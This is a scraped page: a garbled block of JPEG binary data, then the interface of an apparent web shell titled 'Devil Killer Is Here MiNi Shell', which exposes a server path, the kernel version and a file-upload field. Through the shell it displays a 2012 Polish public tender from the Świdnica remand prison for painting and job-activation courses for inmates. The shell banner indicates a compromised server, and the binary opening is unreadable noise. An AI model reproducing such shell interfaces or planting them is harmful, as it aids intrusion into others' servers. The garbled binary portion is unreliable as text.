JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121018/406176-N-2012.html

<p class="kh_header"><b>Świdnica: OGŁOSZENIE O ZAMÓWIENIU 
NA PRZEPROWADZENIE KURSÓW DLA OSÓB POZBAWIONYCH WOLNOŚCI W RAMACH POKL W ARESZCIE ŚLEDCZYM W ŚWIDNICY</b><br>
<b>Numer ogłoszenia: 406176 - 2012; data zamieszczenia: 18.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Świdnicy , ul. Trybunalska 16, 58-100 Świdnica, woj. dolnośląskie, tel. 0-74 854 93 00, faks 0-74 854 93 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: więziennictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OGŁOSZENIE O ZAMÓWIENIU 
NA PRZEPROWADZENIE KURSÓW DLA OSÓB POZBAWIONYCH WOLNOŚCI W RAMACH POKL W ARESZCIE ŚLEDCZYM W ŚWIDNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie dwóch kursów malarza wraz z zajęciami aktywizacji zawodowej dla osób pozbawionych wolności, zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia zwanej dalej SIWZ.
Kursy są organizowane w ramach Projektu  Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowanego przez Centralny Zarząd Służby Więziennej. Projekt ten jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Kod CPV - 80500000-9 Usługi szkoleniowe
Zakres zamówienia:
PAKIET I: Przeprowadzenie kursu: malarz wraz z zajęciami aktywizacji zawodowej - jeden cykl
Miejsce szkolenia - Areszt Śledczy w Świdnicy 
Ilość godzin zajęć teoretycznych kursu: 20
Ilość godzin zajęć praktycznych kursu: 50
Ilość godzin aktywizacji zawodowej: 20 (w tym zajęcia z doradcą zawodowym i liderem klubu pracy)
Ilość uczestników kursu i aktywizacji zawodowej: 12 osób pozbawionych wolności
Termin realizacji zamówienia: 14.11 -7.12.2012 (wskazane jest rozpoczęcie zajęć 14.11.2012 roku)
PAKIET II: Przeprowadzenie kursu: malarz wraz z zajęciami aktywizacji zawodowej - jeden cykl
Miejsce szkolenia - Areszt Śledczy w Świdnicy 
Ilość godzin zajęć teoretycznych kursu: 20
Ilość godzin zajęć praktycznych kursu: 50
Ilość godzin aktywizacji zawodowej: 20 (w tym zajęcia z doradcą zawodowym i liderem klubu pracy)
Ilość uczestników kursu i aktywizacji zawodowej: 12 osób pozbawionych wolności
Termin realizacji zamówienia: 26.11 -19.12.2012 (wskazane jest rozpoczęcie zajęć 26.11.2012 roku)
Przez godzinę zajęć teoretycznych należy rozumieć 45 min, a zajęć praktycznych 60 minut.
Oczekiwanym efektem kursów jest nabycie przez beneficjentów ostatecznych wiedzy teoretycznej oraz umiejętności praktycznych niezbędnych do podjęcia pracy na wyżej wymienionym stanowisku.  
Zakres zajęć aktywizacji zawodowej powinien obejmować minimum. 
analiza swoich mocnych i słabych stron, rynek pracy (oczekiwania pracodawców oraz trafność wyboru zawodu), prawa i obowiązki pracodawcy oraz pracownika, metodyka aktywnego poszukiwania pracy i powrotu na rynek pracy, skuteczne sposoby poszukiwania pracy, analiza ofert pracy, właściwe przygotowanie się do rozmowy kwalifikacyjnej, przygotowanie dokumentów aplikacyjnych.
Zamawiający zapewnieni, w trakcie trwania zajęć pomieszczenia, które będą  przygotowane do prowadzenia zajęć dydaktyczno-wychowawczych i do realizacji praktycznej nauki zawodu.
Zamawiający  podpisze do każdego kursu aktywizacji listę rezerwową uczestników składającą się z 3 osób, umożliwiającą łatwe wprowadzenie nowej osoby na miejsce rezygnującej osoby. Osoba rezerwowa może zostać wprowadzona na miejsce osoby rezygnującej pod warunkiem iż nie upłynęło więcej niż 20% zajęć. A Wykonawca w sytuacji wprowadzenia osoby rezerwowej dołoży wszelkich starań by osoba dołączona do grupy uzupełniła zakres zajęć w których nie uczestniczyła.
Jeżeli nie ukończenie kursu aktywizacji przez beneficjenta ostatecznego nastąpi z jego winy (wskutek: rezygnacji beneficjenta ostatecznego z uczestnictwa w zajęciach, niewłaściwego zachowania, stwarzania zagrożenia dla osób prowadzących zajęcia lub innych jego uczestników) lub wskutek okoliczności od beneficjenta ostatecznego niezależnych (konieczność przetransportowania na polecenie organów procesowych), a uzupełnienie liczby kursantów w sposób opisany w § 1 ust. 12-13 umowy, ze względu na stopień zaawansowania zajęć nie umożliwiłoby osiągnięcia celu zajęć przez beneficjenta ostatecznego, który miałby zostać zakwalifikowany do kursu/aktywizacji lub też lista osób rezerwowych została już wyczerpana, liczby uczestników kursu aktywizacji nie uzupełnia się. 
Zamawiający do przeprowadzenia zajęć praktycznych kursu dostarczy zagęszczarkę lub  urządzenie do cięcia płytek  (w zależności od rodzaju kursu).
Wykonawca sporządzi harmonogram kursu i zajęć aktywizacji zawodowej w porozumieniu z Zamawiającym, przekaże go Zamawiającemu nie później niż na 5 dni roboczych przed rozpoczęciem zajęć. Podczas sporządzania harmonogramu należy uwzględnić przerwy między zajęciami zgodnie z przepisami. Sporządzając harmonogram Wykonawca ma obowiązek ustalić dni i godziny zajęć z Zamawiającym. 
Wykonawca przedłoży (najpóźniej w dniu podpisania umowy) Zamawiającemu program kursu oraz program zajęć aktywizacji zawodowej który będzie zawierał w szczególności nazwę i zakres szkolenia, czas trwania i sposób organizacji szkolenia, wymagania wstępne dla uczestników szkolenia, cele szkolenia, plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, sposób sprowadzenia efektów szkolenia. Powyższy program będzie zgodny z:
Rozporządzeniem Ministra Edukacji i Nauki z 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r. poz. 186);
Ustawą z dnia 7.09.1991r. o systemie oświaty (Dz. U. z 2004r. nr 256, poz. 2572, z późn. zm.) 
Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r . w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. z 2007r. Nr 47, poz. 315)
Rozporządzeniem Ministra Sprawiedliwości z dnia 18 września 2009 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. Nr 169, poz. 1331 z późn. zm.)
Ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Nr 133, poz. 883, z późn. zm.)
Wykonawca podpisując umowę z Zamawiającym zobowiązuje się do przeprowadzenia usługi szkoleniowej (kurs oraz aktywizacja zawodowa) zgodnie z obowiązującymi przepisami (w tym przepisami dotyczącymi nauczania) oraz zgodnie z przepisami dotyczącymi realizacji programów współfinansowanych ze środków Unii Europejskiej w tym Programu Operacyjnego Kapitał Ludzki.
Wykonawca przeprowadzi po każdym z kursów oraz po zajęciach aktywizacji zawodowej ankietę badającą opinię na temat realizowanej usługi oraz weryfikująca czy uczestnicy zajęć wiedzą, iż kurs i aktywizacja są współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 
Wykonawca zobowiązuje się do przedłożenia (najpóźniej w dniu podpisania umowy) kalkulacji (kosztorysu) wartości usługi. Rzeczowy kosztorys zostanie dołączony do umowy.
Wykonawca zapewnieni warunki bezpiecznej i higienicznej nauki i pracy podczas kursu.
Wykonawca będzie zobowiązany do jednoznacznego określania i używania formy kształcenia zgodnej z formami kształcenia określonymi w § 3 pkt. 5 rozporządzenia Ministra Edukacji i Nauki z 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r. poz. 186);
Zamawiający nie będzie przekazywał Wykonawcy danych osobowych uczestników szkolenia. Wszelkie dane niezbędne do prowadzenia zajęć Wykonawca winien gromadzić bezpośrednio od osadzonych objętych wsparciem z chwilą jego rozpoczęcia. Wykonawca będzie zobowiązany do ochrony i przechowywania danych osobowych uczestników kursu i aktywizacji zgodnie z ustawą z dnia 29 sierpnia 1997 roku o ochronie danych osobowych.
Wykonawca będzie zobowiązany do wykonania umowy z należytą starannością oraz do czuwania nad prawidłowością realizacji zawartej umowy.
Wykonawca zobowiązuje się do przeszkolenia uczestników kursu z zakresu BHP.
Wykonawca zobowiązuje się do wystawienia każdemu uczestnikowi, po pozytywnym ukończeniu kursu (pod warunkiem uczestnictwa w co najmniej 80% zajęć) zaświadczenia zgodnego z  rozporządzeniem Ministra Edukacji i Nauki z 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r. poz. 186) oraz zgodnego z wzorem stanowiącym załącznik nr 5 do ww rozporządzenia. Ponadto Wykonawca wystawi uczestnikom certyfikaty ukończenia kursu opatrzone w stosowne logotypy i zapisy umożliwiające identyfikację realizowanego kursu zgodnie z wytycznymi dot. oznaczenia projektów systemowych w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013;
Wykonawca zobowiązuje się do wystawienia każdemu uczestnikowi aktywizacji odpowiedniego certyfikatu.
Wykonawca zobowiązuje się do przechowywania i udostępniania dokumentacji związanej z realizacją kursu oraz aktywizacji zawodowej do dnia 31.12.2020 r.
Wykonawca zobowiązuje się do umożliwienia Zamawiającemu oraz uprawnionym instytucjom zewnętrznym do dokonania  kontroli  dokumentacji dot. realizowanego w ramach niniejszej umowy kursu, w siedzibie instytucji szkoleniowej i miejscu realizacji projektu w zakresie i na zasadach wynikających z obowiązujących przepisów.
Wykonawca zobowiązuje się do zapewnienia uczestnikom koniecznych materiałów dydaktycznych do zajęć teoretycznych. W przypadku zakupu podręczników każdy uczestnik musi otrzymać odrębny egzemplarz - nie dopuszcza się sporządzania kserokopii podręczników. Jeden egzemplarz materiałów dydaktycznych przekazanych uczestnikom kursu zostanie dołączony do dokumentacji szkoleniowej Zamawiającego.
Wykonawca zobowiązuje się do oznaczenia materiałów dydaktycznych oraz dokumentacji  przebiegu kursu logotypami i zapisami zapewniającymi identyfikację wizualną realizowanego kursu zgodnie z aktualnymi wytycznymi dot. oznaczenia projektów systemowych w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Wykonawca sporządzi wykaz materiałów dydaktycznych przekazanych beneficjentom i przekaże go Zamawiającemu po zakończeniu kursu, wraz z pokwitowaniem ich odbioru przez uczestników kursu. Materiały dydaktyczne przekazane uczestnikom zajęć po ukończeniu kursu przechodzą na ich własność.
Wykonawca ma obowiązek ubezpieczenia uczestników kursu oraz osób prowadzących kurs od następstw nieszczęśliwych wypadków (NNW)  w związku z uczestnictwem w kursie oraz w drodze do i z miejsca kursu, od dnia rozpoczęcia do dnia zakończenia zajęć - kopia polisy zostanie przekazana Zamawiającemu najpóźniej dzień przed rozpoczęciem zajęć kursowych. Zamawiający nie ponosi odpowiedzialności za poniesiony uszczerbek na zdrowiu zaistniały u osób prowadzących szkolenie w wyniku nieprzewidzianych wypadków losowych.
Wykonawca zapewnieni wykwalifikowaną kadrę posiadającą co najmniej kilkuletnie doświadczenie w prowadzeniu zajęć kursowych oraz zajęć aktywizacji zawodowej oraz wskaże na piśmie, osoby, które będą realizowały kurs na terenie Aresztu Śledczego w Świdnicy wraz z podaniem ich numerów dowodów osobistych, numerem pesel oraz adresem zamieszkania. Osoby wyznaczone przez Wykonawcę zobowiązują się do przestrzegania porządku wewnętrznego Aresztu Śledczego w Świdnicy oraz do zachowania zasad bezpieczeństwa. Osoba realizująca kurs musi odpowiadać następującym kryteriom: korzysta w pełni z praw cywilnych i obywatelskich, nie była skazana za przestępstwo popełnione umyślnie, daje rękojmię należytego wykonywania przyjętych na siebie obowiązków, ukończyła 24 lata, a w wyjątkowych wypadkach 21 lat, jeżeli posiada kwalifikacje lub doświadczenie życiowe wskazujące na przydatność w prowadzeniu działalności wychowawczej i resocjalizacyjnej.
Osoby wyznaczone przez Wykonawcę do realizacji zajęć na terenie Aresztu Śledczego w  Świdnicy obowiązane są zapoznać się z porządkiem wewnętrznym Aresztu Śledczego w Świdnicy, zasadami bezpieczeństwa Aresztu Śledczego w Świdnicy, zasadami poruszania się po Aresztu Śledczego w Świdnicy, zasadami ochrony informacji niejawnych.
W razie naruszenia wyżej wymienionych przepisów i zasad, Dyrektor Aresztu Śledczego w Świdnicy zwraca się ze stosownymi uwagami do Wykonawcy a w przypadku nieustosunkowania się przez Wykonawcę do informacji Dyrektora Aresztu Śledczego w Świdnicy w terminie do 3 dni i niepodjęcia stosownych działań dyscyplinujących w terminie do 3 dni od otrzymania informacji, Dyrektor Aresztu Śledczego w Świdnicy może wypowiedzieć niniejszą umowę w trybie natychmiastowym.
W przypadku wypowiedzenia umowy w trybie natychmiastowym, o którym mowa powyżej, Zamawiający pokryje koszty ukończonych kursów. Za kursy ukończone rozumie się kursy, których wykonanie potwierdzone zostało protokołem odbioru usługi.
Wykonawca zorganizuje i sfinansuje odpowiednie badania lekarskie uczestnikom kursu dopuszczające do udziału w kursie. Badania zostaną również wykonane uczestnikom rezerwowym.
4.29	Wykonawca w zakresie zajęć praktycznych zapewni:
odzież roboczą (w przypadku złej pogody podczas kursu brukarza dodatkowo nakrycie chroniące przed deszczem), obuwie i środki ochrony indywidualnej zgodnie z obowiązującymi przepisami BHP (dostosowane do pory roku i miejsca wykonywanych prac) - dla każdego uczestnika kursu, a które stają się własnością Zamawiającego po zakończeniu kursów,
materiały i narzędzia niezbędne do prawidłowego przeprowadzenia zajęć praktycznych  w wysokości  nie przekraczającej 40% wartości danego kursu. Na koniec szkolenia Wykonawca przedłoży Zamawiającemu kserokopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu. Sprzęt i materiały zużywalne zakupione ze środków przeznaczonych na realizację kursu stają się własnością Zamawiającego po jego zakończeniu i zostaną przekazane protokołem zdawczo - odbiorczym.
napoje.
Zakup materiałów i narzędzi oraz ich dostawę na teren jednostki penitencjarnej zapewnia Wykonawca. 
Wykonawca zobowiązuje się do prowadzenia dokumentacji przebiegu szkolenia. Dokumentacje stanowią:
program nauczania kursu i aktywizacji, dziennik zajęć edukacyjnych (oddzielny dla kursu i aktywizacji), listy obecności na których beneficjenci składają podpis długopisem koloru niebieskiego, a które po zakończeniu zajęć zostaną przekazane Zamawiającemu, protokół przebiegu egzaminu (jeśli został przeprowadzony), rejestr wydanych zaświadczeń, kserokopie wydanych zaświadczeń (Wykonawca przekazuje Zamawiającemu dwa egzemplarze kserokopii wydanych zaświadczeń), wykaz wydanych zaświadczeń i certyfikatów wraz z potwierdzonym przez uczestników kursu ich odbiorem, wykaz przekazanych materiałów oraz środków ochrony indywidualnej wraz z potwierdzonym przez uczestników kursu ich odbiorem, Jeden egzemplarz materiałów szkoleniowych przekazanych beneficjentom, który po zakończeniu szkolenia zostanie dołączony do dokumentacji Zamawiającego, Przeprowadzone ankiety na temat kursu i aktywizacji, Dokumenty potwierdzające ubezpieczenie uczestników, Faktury VAT lub rachunki potwierdzające dostarczenie materiałów w wymaganej ilości (kserokopie dokumentów wraz ze sporządzoną kalkulacją wykonanej usługi należy dołączyć do dokumentacji kursowej przekazywanej Zamawiającemu po zakończeniu szkolenia),
Wszelką dokumentację związaną z kursem oraz aktywizacją zawodową należy sporządzić i prowadzić zgodnie z wytycznymi zawartymi w przepisach odnoszących się do szkolnictwa a w szczególności w przepisach związanych z kształceniem dorosłych w formach pozaszkolnych.
Po zakończeniu kursu i seminarium Wykonawca przekaże Zamawiającemu dokumentację szkoleniową. W przypadku przekazywania kserokopii dokumentacji każda ze stron musi być potwierdzona za zgodność z oryginałem.
Wykonawca zapewni wywóz zanieczyszczeń, gruzu powstałych w wyniku zajęć kursowych.
W przypadku nie przystąpienia lub nie ukończenia kursu lub zajęć aktywizacyjnych przez beneficjenta, jeżeli nie uzupełniono liczby kursantów w sposób opisany w § 1 ust. 12-14 umowy, należna Wykonawcy kwota za przeszkolenie tego beneficjenta ostatecznego ulega pomniejszeniu o kwotę stanowiącą iloczyn ilości godzin kursu lub zajęć aktywizacyjnych, w których nie uczestniczył i kosztu godziny szkolenia jednego beneficjenta ostatecznego ustalonej w § 5 ust. 1 umowy. 
Rachunek  faktura za przeprowadzenie usługi zostanie wystawiona i dostarczona Zamawiającemu nie wcześniej niż po zakończeniu całości zamówienia i dostarczeniu wszelkiej dokumentacji wynikającej z umowy. Płatność za poszczególne kursy i zajęcia aktywizacji zawodowej nastąpi przelewem z rachunku Zamawiającego na konto Wykonawcy w ciągu 30 dni od zakończenia całości zamówienia i dostarczenia przez Wykonawcę:
Faktury/rachunku za kurs (nazwa usługi widniejąca na dokumencie: kurs:  zgodnie z umową nr)
Faktury/rachunku za zajęcia aktywizacyjne (nazwa usługi widniejąca na dokumencie: zajęcia aktywizacji zawodowej zgodnie z umową nr )
informacji o przebiegu kursu i aktywizacji, sporządzonej w formie protokółu (wzór protokołu stanowi załącznik nr 9 do umowy), który podpisują Zamawiający i Wykonawca. Protokół odbioru usługi należy sporządzić po zakończeniu kursu oraz seminarium.
Protokołu z przebiegu egzaminu końcowego (jeżeli został przeprowadzony).
innej dokumentacji wynikającej z niniejszej umowy, potwierdzającej prawidłowość jej realizacji (patrz pkt. 4.31)
Kserokopie składanej dokumentacji należy potwierdzić za zgodność z oryginałem
W przypadku braku środków finansowych w chwili zakończenia kursu Zamawiający zastrzega możliwość odroczenia terminu płatności o czym pisemnie powiadomi Wykonawcę. Płatność w takim przypadku nastąpi niezwłocznie po otrzymaniu środków finansowych przez Zamawiającego.
Powołując się na art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych:
Zamawiający zastrzega możliwość odstąpienia od realizacji kursu oraz zajęć aktywizacyjnych w przypadku nieotrzymania w planie wydatków budżetowych wystarczającej ilości środków finansowych, które Zamawiający zamierzał przeznaczyć na ich sfinansowanie oraz w przypadku otrzymania środków w terminie, w którym z przyczyn organizacyjnych, technicznych nie będzie możliwości zrealizowania kursu oraz zajęć aktywizacyjnych. Wykonawcy z tego tytułu nie przysługuje wynagrodzenie za nieprzeprowadzony kurs lub zajęcia aktywizacyjne  jak również żadne odszkodowanie. Wykonawca o zaistniałej sytuacji zostanie powiadomiony w sposób pisemny.
Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej oraz niepodlegające zwrotowi środki z pomocy udzielonej przez państwa członkowskie europejskiego porozumienia o wolnym handlu (efta), które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane. w sytuacji nieotrzymania środków, wykonawcy zamówienia nie przysługuje wówczas wynagrodzenie za niezrealizowane usługi jak również odszkodowanie
Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczestników kursu oraz uczestników rezerwowych w przypadku braku wystarczającej liczby osób spełniających kryteria uczestnictwa w zajęciach. W takiej sytuacji wynagrodzenie Wykonawcy to iloczyn ilości uczestników i ceny przypadającej na jednego uczestnika z zastrzeżeniem pkt. 4.33. Zamawiający o zaistniałej sytuacji zostanie poinformowany pisemnie, informacja pisemna zostanie załączona również do umowy. W przypadku zmniejszenia liczby osób na kursie Wykonawca ma obowiązek w ciągu 3 dni roboczych dostarczyć Zamawiającemu nowy preliminarz kosztów (załącznik nr 5 do SIWZ).
Zamawiający zastrzega sobie możliwość odstąpienia od realizacji kursu oraz zajęć aktywizacyjnych w przypadku gdy nie zostanie uzbierana odpowiednia grupa osób spełniających kryteria uczestnictwa w zajęciach. Wykonawcy z tego tytułu nie przysługuje wynagrodzenie za nieprzeprowadzony kurs lub zajęcia aktywizacyjne  jak również żadne odszkodowanie. Wykonawca o zaistniałej sytuacji zostanie powiadomiony w sposób pisemny.
Zamawiający zastrzega sobie możliwość zmiany terminu zakończenia kursu w przypadku problemów z uzbieraniem właściwej grupy uczestników kursu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 14.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kserokopię posiadanego wpisu do Rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy i  kserokopię aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. odpis przedsiębiorców z Krajowego Rejestru Sądowego). Kserokopie winny być potwierdzone za zgodność z oryginałem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Łączne zaangażowanie przez Wykonawcę w realizację zadań we wszystkich projektach NSRO nie przekracza 240 godzin miesięcznie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li></ul>
